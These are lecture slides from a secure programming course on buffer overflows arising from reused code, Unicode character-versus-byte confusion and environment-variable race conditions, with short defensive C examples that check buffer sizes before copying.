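One way to avoid the characters-versus-bytes mix-up is to state buffer capacity in bytes and do the multiplication in exactly one place. The sketch below assumes 16-bit code units stored as uint16_t; the function name `copy_utf16` is made up for this example.

```c
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* Copies n_chars 16-bit code units into a destination whose capacity is
 * given in BYTES. The size check accounts for the width of a code unit
 * instead of assuming one byte per character.
 * Returns 0 on success, -1 if the text does not fit. */
int copy_utf16(void *dst, size_t dst_bytes,
               const uint16_t *src, size_t n_chars)
{
    if (n_chars > dst_bytes / sizeof(uint16_t))
        return -1;
    memcpy(dst, src, n_chars * sizeof(uint16_t));
    return 0;
}
```

Five code units are rejected for a 5-byte buffer and accepted for a 10-byte one. Dividing the capacity, instead of multiplying the count, also keeps the check itself from overflowing.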

CS 330 Secure Programming 119 Old code used for new purposes - Consequences

• This is more common and more easily exploitable than you might think. • A “Venetian exploit” can hijack a program with a reasonably sized buffer overflow even if UNICODE format forces the attacker to have half of his attack code bytes be zeros.

CS 330 Secure Programming 120 Old code for new purposes - Recommendations

• Enumerate and challenge all assumptions you’ve made about the interaction between old code and new
• Test thoroughly
• If your software allows the user to use UNICODE, then repeat all tests with UNICODE
• Include the old code in code inspection
• Test code on every type of platform it will likely be used on
– Depending on how the processor arranges memory, an off-by-one error of a single byte could have no effect on one architecture, but cause a bug on another

CS 330 Secure Programming 121 All sorts of other far-fetched but deadly-serious things you should think about - Problem

• Sometimes seemingly reasonable assumptions are just not true

• Attackers have plenty of time and infinite creativity

• A thoroughly tested and inspected piece of software might still be vulnerable through a series of a half dozen or so clever tricks

CS 330 Secure Programming 122 All sorts of other far-fetched but deadly-serious things you should think about - Consequences

• Your software might be a UNIX utility that spawns two processes
• One sets an environment variable to either “CHUCKY” or “CHEESE”, and the second reads it

CS 330 Secure Programming 123 All sorts of other far-fetched but deadly-serious things you should think about - Consequences

• The reading process doesn’t bother to check the size before it copies the value into a buffer because it is just an environment variable you made up and is guaranteed to have six characters, right?

• There is no user I/O involved

CS 330 Secure Programming 124 All sorts of other far-fetched but deadly-serious things you should think about - Consequences

• But the attacker can force a race condition that changes the environment variable between when one process writes it and when the other process reads it. The attacker gives the environment variable more than six characters, causing a buffer overflow
• Add getenv() to the long list of dangerous library functions
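Treating the environment as untrusted input could look like the sketch below: measure the value that getenv() actually returned before copying it anywhere. The function name `getenv_checked` and the variable name used in the usage note are hypothetical.

```c
#include <stdlib.h>
#include <string.h>

/* Copies the value of the environment variable name into buf.
 * Returns 0 on success, -1 if the variable is unset or its value
 * (plus the terminating NUL) does not fit in size bytes. */
int getenv_checked(const char *name, char *buf, size_t size)
{
    const char *value = getenv(name);
    size_t needed;

    if (value == NULL)
        return -1;
    needed = strlen(value) + 1;
    if (needed > size)
        return -1;
    memcpy(buf, value, needed);
    return 0;
}
```

With a 7-byte buffer, a variable such as CS330_DEMO set to "CHUCKY" is accepted, while the same variable set to "CHUCKYCHEESE" is rejected instead of overflowing the buffer.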

CS 330 Secure Programming 125 All sorts of other far-fetched but deadly-serious things you should think about - Recommendations

• Challenge all of your assumptions like an attacker would
• Never assume that a well inspected and thoroughly tested piece of software is absolutely defect free

• As long as programmers use C there will always be buffer overflows, hopefully just not as many
